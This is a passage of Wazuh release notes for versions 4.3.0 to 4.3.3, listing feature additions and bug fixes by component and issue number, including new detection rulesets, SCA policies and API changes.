  • #4166 The visualization of Status panel in Agents is replaced.

  • #4166 The visualization of policy in Modules/Security configuration assessment/Inventory is replaced.

  • #4166 #4199 Consistency is improved in the colors and labels used for the agent status.

  • #4169 How the full and partial scan dates are displayed in the Details panel of Vulnerabilities/Inventory is replaced.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x
  • #4166 #4188 The pending agent status is added to some sections where it was missing.

  • #4166 The visualization of Status panel in Agents is replaced.

  • #4166 The visualization of policy in Modules/Security configuration assessment/Inventory is replaced.

  • #4166 Consistency is improved in the colors and labels used for the agent status.

  • #4169 How the full and partial scan dates are displayed in the Details panel of Vulnerabilities/Inventory is replaced.

Wazuh Splunk app
  • #1327 Splunk search-handler event management is improved to avoid forwarder toast error misinterpretation.

Packages
  • #1595 Splunk packages builder is simplified.

  • #1606 The Wazuh logo on the login page is updated.

  • #1628 Support for Ubuntu 22 is added.

  • #1548 The installation assistant now changes the Wazuh API default passwords.

Resolved issues

This release resolves known issues.

Wazuh manager

Reference

Description

#13621

A bug in agent_groups CLI when removing agent groups is fixed.

#13459

Linux compilation errors with GCC 12 are fixed.

#13604

A crash in wazuh-analysisd when overwriting a rule with a configured active response is fixed.

#13666

A crash in wazuh-db when it cannot open a database file is fixed.

#13566

The vulnerability feed parsing mechanism now truncates excessively long values (This problem was detected during Ubuntu Bionic feed update).

#13679

A crash in wazuh-maild when parsing an alert with no full log and containing arrays of non-strings is fixed.

RESTful API

Reference

Description

#13550

The default timeouts for GET /mitre/software and GET /mitre/techniques are updated to avoid timing out in slow environments.

Ruleset

Reference

Description

#13560

The prematch criteria of sshd-disconnect decoder is fixed.

Wazuh dashboard

Reference

Description

#4166

When the platform visualizations didn't use some definitions related to the UI on Kibana 7.10.2 is now fixed.

#4167

A toast message with a successful process appeared when removing an agent of a group in Management/Groups and the agent appears in the agent list after refreshing the table is fixed.

#4176

The import of an empty rule or decoder file is fixed.

#4180

The overwriting of rule and decoder imports is now fixed.

Wazuh Kibana plugin for Kibana 7.10.2

Reference

Description

#4166

When the platform visualizations didn't use some definitions related to the UI on Kibana 7.10.2 is now fixed.

#4167

A toast message with a successful process appeared when removing an agent of a group in Management/Groups and the agent appears in the agent list after refreshing the table is fixed.

#4176

The import of an empty rule or decoder file is fixed.

#4180

The overwriting of rule and decoder imports is now fixed.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x

Reference

Description

#4166

When the platform visualizations didn't use some definitions related to the UI on Kibana 7.10.2 is now fixed.

#4167

A toast message with a successful process appeared when removing an agent of a group in Management/Groups and the agent appears in the agent list after refreshing the table is fixed.

#4176

The import of an empty rule or decoder file is fixed.

#4180

The overwriting of rule and decoder imports is now fixed.

#4157

Wazuh now maintains the filters when clicking on the Visualize button of a document field from <Module>/Events and redirects to the lens plugin.

#4198

Missing background in the status graph tooltip in agents is fixed.

#4219

The problem allowing to remove the filters from the module is fixed.

Wazuh Splunk app

Reference

Description

#1329

Unhandled expired session when requesting Splunk DB documents is fixed.

Packages

Reference

Description

#1613

Suse init script installation in agent is fixed.

Changelogs

More details about these changes are provided in the changelog of each component:

4.3.3 Release notes - 1 June 2022

This section lists the changes in version 4.3.3. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements.

Wazuh Kibana plugin
  • Wazuh Kibana plugin is now compatible with Wazuh 4.3.3.

Wazuh Splunk app
  • Wazuh Splunk app is now compatible with Wazuh 4.3.3.

Resolved issues

This release resolves known issues.

Manager

Reference

Description

#13651

Avoid creating duplicated <client> configuration blocks during deployment.

Agent

Reference

Description

#13642

Prevent Agentd from resetting its configuration on <client> block re-definition.

Wazuh dashboard

Reference

Description

#4151

The Wazuh dashboard troubleshooting URL is now fixed.

Wazuh Kibana plugin for Kibana 7.10.2

Reference

Description

#4150

The Wazuh Kibana plugin troubleshooting URL is now fixed.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x

Reference

Description

#4146

A bug that prevented removing implicit filters in modules is now fixed.

#4150

The Wazuh Kibana plugin troubleshooting URL is now fixed.

Changelogs

More details about these changes are provided in the changelog of each component:

4.3.2 Release notes - 30 May 2022

This section lists the changes in version 4.3.2. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new
Wazuh Splunk app
  • Wazuh Splunk app is now compatible with Wazuh 4.3.2.

Resolved issues

This release resolves a known issue.

Manager

Reference

Description

#13617

A crash in Vulnerability Detector when scanning agents running on Windows is now fixed.

Changelogs

More details about these changes are provided in the changelog of each component:

4.3.1 Release notes - 18 May 2022

This section lists the changes in version 4.3.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements.

Wazuh dashboard
  • #4142 Added a warning about the PowerShell version requirement in the Windows agent installation wizard.

Wazuh Splunk app
  • #1322 Added a warning about the PowerShell version requirement in the Windows agent installation wizard.

  • #1323 The compatibility checks of the app have been changed to simplify the release flow.

Resolved issues

This release resolves known issues.

Manager

Reference

Description

#13439

A crash when overwritten rules are triggered is fixed.

#13439

A memory leak when loading overwritten rules is fixed.

#13439

The use of relationship labels in overwritten rules is now fixed.

#13430

The regex used to transform into datetime in the logtest framework function is fixed.

RESTful API

Reference

Description

#13178

The API response when using sort in Agent upgrade related endpoints is now fixed.

Ruleset

Reference

Description

#13409

Fixed rule 92656, added field condition win.eventdata.logonType equals 10 to avoid false positives.

Wazuh dashboard

Reference

Description

#4141

Enhanced the output of the Ruleset Test tool. An error that caused falsy values to be displayed as undefined is now fixed.

Wazuh Splunk app

Reference

Description

#1320

Fixed the render condition of a toast message related to the forwarder when there is no data of agents and the agent deployment guide is displayed in the Agents section.

#1318

The access to Management/Configuration due to missing permissions when the manager cluster is disabled is now fixed.

Changelogs

More details about these changes are provided in the changelog of each component:

4.3.0 Release notes - 5 May 2022

This section lists the changes in version 4.3.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

Wazuh 4.3.0 includes many new additions, such as a remarkable enhancement with the new Wazuh indexer and Wazuh dashboard that improve the user experience and facilitate the management of the whole platform.

Version 4.3.0 enhances the performance of the Wazuh solution and adds new integrations such as the following:

  • Vulnerability Detector support for Amazon Linux and Arch Linux

  • New agent integrations with logs from Office 365 and GitHub

  • Improved RESTful API availability thanks to the API now using multiple processes

  • Now the Wazuh manager cluster uses multiple processes for improved performance

  • Wazuh now supports Logcollector with native macOS logs (Unified Logging System)

  • AWS S3 Server Access logs, Google Cloud Storage buckets, and access logs are now supported too

Below you will find more information about each of these new features.

With Wazuh 4.3.0, two new installers called the Wazuh indexer, and the Wazuh dashboard are available to users to facilitate installation, upgrades, and configuration. The Wazuh indexer is a customized OpenSearch distribution with configurations and tools needed to run out of the box for Wazuh. The Wazuh dashboard is a customized OpenSearch dashboards distribution with the Wazuh plugin embedded, plus new configurations and customizations.

The new Wazuh dashboard is a flexible and intuitive web interface for mining, analyzing, and visualizing data. It provides out-of-the-box dashboards, allowing users to navigate the interface that now presents a renewed design with a new palette of colors. The versioning equivalent to the Wazuh manager will allow upgrades without the risk of incompatibilities.

An installation assistant wazuh-install.sh is available to users, allowing any type of installation, whether an all-in-one, single node, or multi-node. This is possible by simply defining a configuration file, with everything connected and secured, including random passwords and generated certificates. In addition, Debian and RPM packages for ppc64le architectures are made available to users.

Now, the agent is able to collect the installed packages inventory on Amazon Linux and Arch Linux, giving support to Vulnerability Detector for reporting vulnerability exposures. In addition, the Vulnerability Detector now manages a vulnerability inventory and produces alerts during the first agents scan and when a new vulnerability is either found or solved.

vulnerability detection inventory

New integrations to collect auditing logs from Office 365 and GitHub are added to the agent in this new version. A side panel component that displays information about the active module of the Office 365 setup is introduced, and the Wazuh dashboard now includes events from Office 365. Moreover, Wazuh now supports Logcollector with native macOS logs (Unified Logging System), AWS S3 Server Access logs, and Google Cloud Storage buckets and access logs.

The RESTful API availability has been enhanced thanks to the API now using multiple processes. The performance of several API endpoints is also improved, which is especially palpable in large environments. Additionally, the agent batch is upgraded with an increased limit of agents per request and a new set of filters.

Wazuh v4.3.0 brings significant changes to the cluster, which now uses multiple processes to improve the performance. The results in the table below show a significant improvement for the cluster in this new version. The cluster tasks are performed 423% faster than in the previous version, approximately five times faster, while the RAM consumption decreased to a third. This performance is especially appreciable during the setup phase, where the cluster load is at its highest.

We want to mention another Wazuh 4.3.0 significant new feature. It is related to a new Intelligence tab added to the MITRE ATT&CK module. This tab provides further information about MITRE resources such as groups, mitigations, tactics, and techniques using the new Wazuh API endpoints. Additionally, the Framework tab is adapted to the new Wazuh API endpoints.

Finally, it is important to remark that we maintain support for all installation alternatives. Indeed we maintain and extend this support by adding more recent versions.

What's new

This release includes new features or enhancements.

Manager
  • #8178 Wazuh adds support for Arch Linux OS in Vulnerability Detector.

  • #8749 A log message in the cluster.log file is added to notify that wazuh-clusterd has been stopped.

  • #9077 Wazuh improves API and cluster processes behavior by adding the PID of the wazuh-clusterd processes and the API when these processes are started in foreground mode.

  • #10492 Time calculation is added when extra information is requested to the cluster_control binary.

  • #9209 Wazuh adds a context variable to indicate the origin module in socket communication messages.

  • #9733 A unit tests for framework/core files is added to increase coverage.

  • #9204 A verbose mode is added in the wazuh-logtest tool.

  • #8830 Wazuh adds Vulnerability Detector support for Amazon Linux.

  • #10693 The new option <force> to set the behavior is introduced when Authd finds conflicts on agent enrollment requests.

  • #9099 Wazuh adds sanitizers to the unit tests execution.

  • #8237 Vulnerability Detector introduces vulnerability inventory.

  • The manager will only deliver alerts when new vulnerabilities are detected in agents or when they stop applying.

  • #11031 A mechanism to ensure the worker synchronization permissions are reset after a fixed period of time is added.

  • #11799 A new mechanism is now added to create and handle PID files for each child process of the API and cluster.

  • #8083 The internal handling of agent keys is changed in Remoted to speed up key reloading.

  • #7885 The option <server> of the Syslog output now supports hostname resolution.

  • #7763 The product's UNIX user and group are renamed to "wazuh".

  • #7865 The MITRE database is redesigned to provide full and searchable data.

  • #7358 The static fields related to FIM are ported to dynamic fields in Analysisd.

  • #8351 All randomly generated IDs used for cluster tasks are changed. Now, uuid4 is used to ensure IDs are not repeated.

  • #8873 The sendsync error log is Improved to provide more details of the used parameters.

  • #9708 The walk_dir function is changed to be iterative instead of recursive.

  • #10183 The Integrity sync behavior is refactored so that new synchronizations do not start until extra-valid files are processed.

  • #10101 Cluster synchronization is changed so that the content of the etc/shared folder is synchronized.

  • #8351 All XML file loads are changed. Now, defusedxml library is used to avoid possible XML-based attacks.

  • #8535 Configuration validation from execq socket is changed to com socket.

  • #8392 The utils unittest is updated to improve process_array function coverage.

  • #8885 The request_slice calculation is changed to improve efficiency when accessing wazuh-db data.

  • #9273 The retrieval of information from wazuh-db is improved to reach the optimum size in a single iteration.

  • #9234 The way framework uses context cached functions and adds a note on context_cached docstring is optimized.

  • #9332 The framework regexes is improved to be more specific and less vulnerable.

  • #9423 The framework exceptions are unified for non-active agents.

  • #9433 The RBAC policies are changed to case insensitive.

  • #9548 Framework stats module is refactored into SDK and core components to comply with Wazuh framework code standards.

  • #10309 The size of the agents' chunks sent to the upgrade socket is changed to make the upgrade endpoints faster.

  • #9408 The rootcheck and syscheck SDK code are refactored to make it clearer.

  • #9738 The Azure-logs module is adapted to use Microsoft Graph API instead of Active Directory Graph API.

  • #8060 Analysisd now reconnects to Active Response if Remoted or Execd gets restarted.

  • #10335 Agent key polling now supports cluster environments.

  • #10357 The support of Vulnerability Detector is extended for Debian 11 (Bullseye).

  • #10326 The remoted performance with an agent TCP connection sending queue is improved.

  • #9093 Agent DB synchronization has been boosted by caching the last data checksum in Wazuh DB.

  • #8892 Logtest now scans new ruleset files when loading a new session.

  • #8237 CVE alerts by Vulnerability Detector now include the time of detection, severity, and score.

  • #10849 The manager startup is fixed when <database_output> is enabled.

  • Improved cluster performance using multiprocessing:
    • #10767 The cluster local_integrity task is changed to run in a separate process to improve overall performance.

    • #10807 Now, the cluster communication with the database for agent information synchronization runs in a separate parallel process.

    • #10920 Now, the cluster processing of the extra-valid files in the master node is carried out in a separate parallel process.

    • #11328 The cluster's file compression task in the master node is carried out in a separate parallel process.

    • #11364 Now, the processing of Integrity files in worker nodes is carried out in a separate parallel process.

    • #11386 Use cluster and API single processing when the wazuh user doesn't have permissions to access /dev/shm.

  • #12446 Support for Windows 11 is added in Vulnerability Detector.

  • #12491 The Ubuntu OVAL feed URL to security-metadata.canonical.com is changed.

  • #12652 Now, Analysisd warns about missing rule dependencies instead of rejecting the ruleset.

  • #8399 The data reporting for Rootcheck scans in the agent_control tool has been deprecated.

  • #8846 The old framework functions used to calculate agent status are now removed.

Agent
  • #8016 An option is added to allow the agent to refresh the connection to the manager.

  • #8532 A new module to collect audit logs from GitHub is introduced.

  • #8461 FIM now expands wildcarded paths in the configuration on Windows agents.

  • #8754 FIM reloads wildcarded paths on full scans.

  • #8306 Wazuh adds a new path_suffix option to the AWS module configuration.

  • #8331 A new discard_regex option is added to the AWS module configuration.

  • #8482 Wazuh adds support for the S3 Server Access bucket type in the AWS module.

  • #9119 Wazuh adds support for Google Cloud Storage buckets using a new GCP module called gcp-bucket.

  • #9119 Wazuh adds support for Google Cloud Storage access logs to the gcp-bucket module.

  • #9420 Wazuh adds support for VPC endpoints in the AWS module.

  • #9279 Wazuh adds support for GCS access logs in the GCP module.

  • #10198 An AIM role session duration parameter to the AWS module is added.

  • #8826 Wazuh adds support for variables in SCA policies.

  • #7721 FIM now fills an audit rule file to support who-data, although Audit is in immutable mode.

  • #8957 An integration to collect audit logs from Office 365 is introduced.

  • #10168 A new field DisplayVersion to Syscollector to help Vulnerability Detector match vulnerabilities for Windows is added.

  • #10148 Wazuh adds support for macOS agent upgrade via WPK.

  • #8632 Wazuh adds Logcollector support for macOS logs (Unified Logging System).

  • #8381 The agent now reports the version of the running AIX operating system to the manager.

  • #8604 The reliability of the user ID parsing in FIM who-data mode on Linux is improved.

  • #10230 AWS service_endpoint parameter description to suit FIPS endpoints too is reworded.

  • #5047 The support of Logcollector for MySQL 4.7 logs is extended.

  • #9887 Agents running on FreeBSD and OpenBSD now report their IP addresses.

  • #8202 The verbosity of FIM debugging logs is reduced.

  • #9992 The agent's IP resolution frequency has been limited to prevent high CPU load.

  • #10236 Syscollector is optimized to use less memory.

  • #10337 Wazuh adds support of ZscalerOS system information in the agent.

  • #10259 Syscollector is extended to collect missing Microsoft product hotfixes.

  • #10396 The osquery integration is updated to find the new osqueryd location as of version 5.0.

  • #9123 The internal FIM data handling has been simplified to find files by their path instead of their inode.

  • #9764 The WPK installer rollback on Windows is reimplemented.

  • #10208 Active responses for Windows agents now support native fields from Eventchannel.

  • #10651 Error logs by Logcollector when a file is missing have been changed to info logs.

  • #8724 The agent MSI installer for Windows now detects the platform version to install the default configuration.

  • #3659 Agent logs for inability to resolve the manager hostname now have info level.

  • #11276 An ID number to connection enrollment logs is added.

  • #10838 Standardized the use of the only_logs_after parameter in the external integration modules.

  • #10900 The oscap module files are removed as it was already deprecated in version 4.0.0.

  • #12150 DockerListener integration shebang is updated to python3 for Wazuh agents.

  • #12779 The ico and jpg files have been updated with the new Wazuh logo for the Windows installer.

RESTful API
  • #7988 A new PUT /agents/reconnect endpoint is added to force agents reconnection to the manager.

  • #6761 The select parameter is added to the GET /security/users, GET /security/roles, GET /security/rules and GET /security/policies endpoints.

  • #8100 The type and status filters are added to GET /vulnerability/{agent_id} endpoint.

  • #7490 An option is added to configure SSL ciphers.

  • #8919 An option is added to configure the maximum response time of the API.

  • #8945 A new DELETE /rootcheck/{agent_id} endpoint is added.

  • #9028 A new GET /vulnerability/{agent_id}/last_scan endpoint is added to check the latest vulnerability scan of an agent.

  • #9028 A new cvss and severity fields and filters are added to GET /vulnerability/{agent_id} endpoint.

  • #9100 An option is added to configure the maximum allowed API upload size.

  • #9142 A new unit and integration tests for API models are added.

  • #9077 A message with the PID of wazuh-apid process when launched in foreground mode is added.

  • #9144 Wazuh adds external id, source, and url to the MITRE endpoints responses.

  • #9297 Custom healthchecks for legacy agents are added in API integration tests, improving maintainability.

  • #9914 A new unit test for the API python module is added to increase coverage.

  • #10238 A docker logs separately in API integration tests environment are added to get cleaner reports.

  • #10437 A new disconnection_time field is added to GET /agents response.

  • #10457 New filters are added to agents' upgrade endpoints.

  • #8288 New MITRE API endpoints and framework functions are added to access all the MITRE information.

  • #10947 Show agent-info permissions flag is added when using cluster_control and in the GET /cluster/healthcheck API endpoint.

  • #11931 Save agents' ossec.log if an API integration test fails.

  • #12085 POST /security/user/authenticate/run_as endpoint is added to API bruteforce blocking system.

  • #12638 A new API endpoint is added to obtain summaries of agent vulnerabilities' inventory items.

  • #12727 The new fields external_references, condition, title, published, and updated are added to GET /vulnerability/{agent_id} API endpoint.

  • #13262 The possibility to include strings in brackets in values of the q parameter is added.

  • #7490 The SSL protocol configuration parameter is renamed.

  • #8827 The API spec examples and JSON body examples are reviewed and updated.

  • The performance of several API endpoints is improved. This is especially appreciable in environments with a big number of agents:
    • #8937 The endpoint parameter PUT /agents/group is improved.

    • #8938 The endpoint parameter PUT /agents/restart is improved.

    • #8950 The endpoint parameter DELETE /agents is improved.

    • #8959 The endpoint parameter PUT /rootcheck is improved.

    • #8966 The endpoint parameter PUT /syscheck is improved.

    • #9046 The endpoint parameter DELETE /groups is improved and API response is changed to be more consistent.

  • #8945 The endpoint parameter DELETE /rootcheck is changed to DELETE /experimental/rootcheck.

  • #9012 The time it takes for wazuh-apid process is reduced to check its configuration when using the -t parameter.

  • #9019 The malfunction in the sort parameter of syscollector endpoints is fixed.

  • #9113 The API integration tests stability when failing in entrypoint is improved.

  • #9228 The SCA API integration tests dynamic to validate responses coming from any agent version are fixed.

  • #9227 All the date fields in the API responses to use ISO8601 are refactored and standardized.

  • #9263 The Server header from API HTTP responses is removed.

  • #9371 The JWT implementation by replacing HS256 signing algorithm with RS256 is improved.

  • #10009 The limit of agents to upgrade using the API upgrade endpoints is removed.

  • #10158 The Windows agent's FIM responses are changed to return permissions as JSON.

  • #10389 The API endpoints are adapted to changes in wazuh-authd daemon force parameter.

  • #10512 The use_only_authd API configuration option and related functionality are deprecated. wazuh-authd will always be required for creating and removing agents.

  • #10745 The API validators and related unit tests are improved.

  • #10905 The specific module healthchecks in API integration tests environment is improved.

  • #10916 The thread pool executors for process pool executors to improve API availability is changed.

  • #11410 The HTTPS options to use files instead of relative paths are changed.

  • #8599 The select parameter from GET /agents/stats/distinct endpoint is removed.

  • #8099 The GET /mitre endpoint is removed.

  • #11410 The option to set the log path in the configuration is deprecated.

Ruleset
  • #11306 Carbanak detection rules are added.

  • #11309 Cisco FTD rules and decoders are added.

  • #11284 Decoders for AWS EKS service are added.

  • #11394 F5 BIG IP ruleset is added.

  • #11191 GCP VPC storage, firewall, and flow rules are added.

  • #11323 GitLab 12.0 ruleset are added.

  • #11289 Microsoft Exchange Server rules and decoders are added.

  • #11390 Microsoft Windows persistence by using registry keys detection is added.

  • #11274 Oracle Database 12c rules and decoders are added.

  • #8476 Rules for Carbanak step 1.A - User Execution: Malicious files are added.

  • #11212 Rules for Carbanak step 2.A - Local discoveries are added.

  • #9075 Rules for Carbanak step 2.B - Screen capture is added.

  • #9097 Rules for Carbanak step 5.B - Lateral movement via SSH are added.

  • #11342 Rules for Carbanak step 9.A - User monitoring is added.

  • #11373 Rules for Cloudflare WAF are added.

  • #11013 Ruleset for ESET Remote console is added.

  • #8532 Ruleset for GitHub audit logs are added.

  • #11137 Ruleset for Palo Alto v8.X - v10.X are added.

  • #11431 SCA policy for Amazon Linux 1 is added.

  • #11480 SCA policy for Amazon Linux 2 is added.

  • #7035 SCA policy for apple macOS 10.14 Mojave is added.

  • #7036 SCA policy for apple macOS 10.15 Catalina is added.

  • #11454 SCA policy for macOS Big Sur is added.

  • #11250 SCA policy for Microsoft IIS 10 is added.

  • #11249 SCA policy for Microsoft SQL 2016 is added.

  • #11247 SCA policy for Mongo Database 3.6 is added.

  • #11248 SCA policy for NGINX is added.

  • #11245 SCA policy for Oracle Database 19c is added.

  • #11154 SCA policy for PostgreSQL 13 is added.

  • #11223 SCA policy for SUSE Linux Enterprise Server 15

  • #11432 SCA policy for Ubuntu 14 is added.

  • #11452 SCA policy for Ubuntu 16 is added.

  • #11453 SCA policy for Ubuntu 18 is added.

  • #11430 SCA policy for Ubuntu 20 is added.

  • #11286 SCA policy for Solaris 11.4 is added.

  • #11122 Sophos UTM Firewall ruleset is added.

  • #11357 Wazuh-api ruleset is added.

  • #11016 Audit rules are updated.

  • #11177 AWS s3 ruleset is updated.

  • #11344 Exim 4 decoder and rules to latest format is updated.

  • #8738 MITRE DB with the latest MITRE JSON specification is updated.

  • #11255 Multiple rules to remove alert_by_email option are updated.

  • #11795 NextCloud ruleset is updated.

  • #11232 ProFTPD decoder is updated.

  • #11242 RedHat Enterprise Linux 8 SCA up to version 1.0.1 is updated.

  • #11100 Rules and decoders for FortiNet products are updated.

  • #11429 SCA policy for CentOS 7 is updated.

  • #8751 SCA policy for CentOS 8 is updated.

  • #11263 SonicWall decoder values are fixed.

  • #11388 SSHD ruleset is updated.

  • #8552 From file 0580-win-security_rules.xml, rules with id 60198 and 60199 are moved to file 0585-win-application_rules.xml, with rule ids 61071 and 61072 respectively.

Wazuh Kibana plugin
  • #3557 GitHub and Office365 modules are added.

  • #3541 A new Panel module tab for GitHub and Office365 modules is added.

  • #3639 Wazuh adds the ability to filter the results for the Network Ports table in the Inventory data section.

  • #3324 A new endpoint service is added to collect the frontend logs into a file.

  • #3327 #3321 #3367 #3373 #3374 #3390 #3410 #3408 #3429 #3427 #3417 #3462 #3451 #3442 #3480 #3472 #3434 #3392 #3404 #3432 #3415 #3469 #3448 #3465 #3464 #3478 The frontend handle errors strategy is improved: UI, Toasts, console log, and log in file.

  • #3368 #3344 #3726 Intelligence tab is added to the MITRE ATT&CK module.

  • #3424 Sample data for office365 events are added.

  • #3475 A separate component to check for sample data is created.

  • #3506 A new hook for getting value suggestions is added.

  • #3531 Dynamic simple filters and simple GitHub filters fields are added.

  • #3524 Configuration viewer for Module Office 365 is added to the Configuration section of the Management menu.

  • #3518 A side panel component that displays information about the active module of the Office 365 setup is introduced.

  • #3533 Specifics and custom filters for Office 365 search bar are added.

  • #3544 Pagination and filter are added to drilldown tables at the Office pannel.

  • #3568 Simple filters change between panel and drilldown panel.

  • #3525 New fields are added to the Inventory table and Flyout Details.

  • #3691 Columns selector are added in agents table.

  • #3742 A new workflow is added for creating wazuh packages.

  • #3783 template and fields checks in the health check run correctly according to the app configuration.

  • #3804 A toast message lets you know when there is an error creating a new group.

  • #3846 A step to start the agent is added to the deploy new Windows agent guide.

  • #3893 3 new panels are added to Vulnerabilities/Inventory.

  • #3893 A new field of Vulnerabilities is added to the details flyout.

  • #3924 Missing fields used in visualizations are added to the known fields related to alerts.

  • #3946 A troubleshooting link is added to the "index pattern was refreshed" toast.

  • #4041 More number options are added to the tables widget in Modules -> "Mitre".

  • #3121 Ossec to wazuh is changed in all sample-data files.

  • #3279 Empty fields are modified in FIM tables and syscheck.value_name in discovery now shows an empty tag for visual clarity.

  • #3346 The MITRE tactics and techniques resources are adapted to use the API endpoints.

  • #3517 The filterManager subscription is moved to the hook useFilterManager.

  • #3529 Filter is changed from "is" to "is one of" in the custom search bar.

  • #3494 Refactor modules-defaults.js to define what buttons and components are rendered in each module tab.

  • #3663 #3806 The deprecated and new references for the authd configuration are updated.

  • #3549 Time subscription is added to the Discover component.

  • #3446 Testing logs using the Ruletest Test don't display the rule information if not matching a rule.

  • #3649 The format permissions are changed in the FIM inventory.

  • #3686 #3728 The request to agents that do not return data is now changed to avoid unnecessary heavy load requests.

  • #3788 Rebranding. Replaced the brand logos, set module icons with brand colors

  • #3795 User used for sample data management is changed.

  • #3792 The agent install codeblock copy button and PowerShell terminal warning is changed.

  • #3811 The naming related to the plugin platform from a specific one to a generic one using the term plugin platform is replaced.

  • #3893 Dashboard tab of Vulnerabilities module is removed, three new panels to Vulnerabilities/Inventory are added, and details Flyout fields are enhanced.

  • #3908 Now, all available fields are shown in the Discover Details Flyout table. Furthermore, the open row icon width is fixed in the first column when the table has a few columns.

  • #3924 Missing fields used in visualizations to the known fields related to alerts are added.

  • #3946 Troubleshooting link to "index pattern was refreshed" toast is added.

  • #3196 The table in Vulnerabilities/Inventory is refactored.

  • #3949 Google Groups app icons are changed.

  • #3857 Sorting for Agents or Configuration checksum column in the table of Management/Groups is removed due to this is not supported by the API.

Wazuh Splunk app
  • Support for Wazuh 4.3.0

  • #1166 Alias field is added to API to facilitate distinguishing between different managers.

  • #1126 Ensure backwards compatibility.

  • #1148 A Security Section is added to manage security related configurations.

  • #1171 Crud Policies are added to the security section.

  • #1168 Crud Roles are added to the security section.

  • #1169 Crud Role Mapping is added to the security section.

  • #1173 Crud Users is added to the security section.

  • #1147 Created a permissions validation service.

  • #1164 Implemented the access control on the App's views.

  • #1155 Implemented a service to fetch Wazuh's users and their roles.

  • #1156 Implemented a server to fetch Splunk's users and their roles.

  • #1149 A run_as checkbox is added to the API configuration.

  • #1174 The ability to use the Authorization Context login method is added.

  • #1228 Extensions now can only be changed by Splunk Admins.

  • #1186 Wazuh rebranding.

  • #1172 Deprecated authd options are updated.

  • #1236 Refactored branding color styles to improve maintainability.

  • #1243 Wazuh API's name is changed to its alias in the quick settings selector.

Other
  • #10247 External SQLite library dependency is upgraded to version 3.36.

  • #10247 External BerkeleyDB library dependency is upgraded to version 18.1.40.

  • #10247 External OpenSSL library dependency is upgraded to version 1.1.1l.

  • #10927 External Google Test library dependency is upgraded to version 1.11.

  • #11436 External Aiohttp library dependency is upgraded to version 3.8.1.

  • #11436 External Werkzeug library dependency is upgraded to version 2.0.2.

  • #11436 Embedded Python is upgraded to version 3.9.9.

Packages
  • #1518 Changed default attributes in Wazuh dashboard package. (A wazuh-dashboard new package with -2 revision was released)

  • #1496 Hide passwords in log file.

  • #1500 The dashboard IP messages are fixed.

  • #1499 Improved APT locked message and retry time.

  • #1497 Unhandled promise for the dashboard is fixed.

  • #1494 Update ova motd message 4.3.

  • #1471 Remove service disable from RPM and Debian packages.

  • #1471 Disabled multitenancy by default in the dashboard and changed the app default route.

  • #1434 Set as a warning the unhandled promises in the Wazuh dashboard.

  • #1395 Remove IP message from OVA.

  • #1390 Remove demo certificates from indexer and dashboard packages.

  • #1307 Add centos8 vault repository due to EOL.

  • #1302 The user deletion warning RPM manager is fixed.

  • #1292 The issue where Solaris 11 was not executed in clean installations is fixed.

  • #1280 The error where Wazuh could continue running after uninstalling is fixed.

  • #1274 The AIX partition size is fixed.

  • #1147 The Solaris 11 upgrade from previous packages is fixed.

  • #1126 Add new GCloud integration files to Solaris 11.

  • #689 Update SPECS.

  • #888 An error in CentOS 5 building is fixed.

  • #944 Add new SCA files to Solaris 11.

  • #915 Improved support for ppc64le on CentOS and Debian.

  • #1005 The error with wazuh user in Debian packages is fixed.

  • #1023 Add ossec user and group during compilation.

  • #1261 Merge Wazuh Dashboard v3 #.

  • #1256 The certs permissions in RPM is fixed.

  • #1208 Kibana app now supports pluginPlatform.version property in the app manifest.

  • #1162 The certificates creation using parameters 4.3 is fixed.

  • #1193 The Archlinux package generation parameters 4.3 are fixed.

  • #1132 Add new 2.17.1 log4j mitigation version 4.3.

  • #1123 The client keys Ownership for 3.7.x and previous versions is fixed.

  • #1106 A new log4j remediation 4.3 is added.

  • #1112 The Linux wpk generation 4.3 is fixed.

  • #1096 Add log4j mitigation 4.3.

  • #1086 Increase admin.pem cert expiration date 4.3.

  • #1078 Remove wazuh user from unattended/OVA/AMI 4.3.

  • #1074 The groupdel ossec error during upgrade to 4.3.0 is fixed.

  • #1067 The curl kibana.yml 4.3 is fixed.

  • #1060 Remove restore-permissions.sh from Debian Packages.

  • #1048 Bump unattended 4.3.0.

  • #1012 Removed cd usages in unattended installer and fixed uninstaller 4.3.

  • #1023 Add ossec user and group during compilation.

  • #1020 Removed warning and added text in wazuh-passwords-tool.sh final message 4.3.

Resolved issues

This release resolves known issues.

Manager

Reference

Description

#8223

A memory defect is fixed in Remoted when closing connection handles.

#7625

A timing problem is fixed in the manager that might prevent Analysisd from sending Active responses to agents.

#8210

A bug in Analysisd that did not apply field lookup in rules that overwrite other ones is fixed.

#8902

The manager is now prevented from leaving dangling agent database files.

#8254

The remediation message for error code 6004 is updated.

#8157

A bug when deleting non-existing users or roles in the security SDK is now fixed.

#8418

A bug with agent.conf file permissions when creating an agent group is now fixed.

#8422

Wrong exceptions with wdb pagination mechanism are fixed.

#8747

An error when loading some rules with the \ character is fixed.

#9216

The WazuhDBQuery class is changed to properly close socket connections and prevent file descriptor leaks.

#10320

An error in the API configuration when using the agent_upgrade script is fixed.

#10341

The JSONDecodeError in Distributed API class methods is handled.

#9738

An issue with duplicated logs in Azure-logs module is fixed and several improvements are applied to it.

#10680

The query parameter validation is fixed to allow usage of special chars in Azure module.

#8394

A bug running wazuh-clusterd process when it was already running is fixed.

#8732

Cluster is now allowed to send and receive messages with a size higher than request_chunk.

#9077

A bug that caused wazuh-clusterd process to not delete its PID files when running in foreground mode and it is stopped is fixed.

#10376

Race condition due to lack of atomicity in the cluster synchronization mechanism is fixed.

#10492

A bug when displaying the dates of the cluster tasks that have not finished yet is fixed. Now, n/a is displayed in these cases.

#9196

Missing field value_type in FIM alerts is fixed.

#9292

A typo in the SSH Integrity Check script for Agentless is fixed.

#10421

Multiple race conditions in Remoted are fixed.

#10390

The manager agent database is fixed to prevent dangling entries from removed agents.

#9765

The alerts generated by FIM when a lookup operation on a SID fails are fixed.

#10866

A bug that caused cluster agent-groups files to be synchronized multiple times unnecessarily is fixed.

#10922

An issue in Wazuh DB that compiled the SQL statements multiple times unnecessarily is fixed.

#10948

A crash in Analysisd when setting Active Response with agent_id = 0 is fixed.
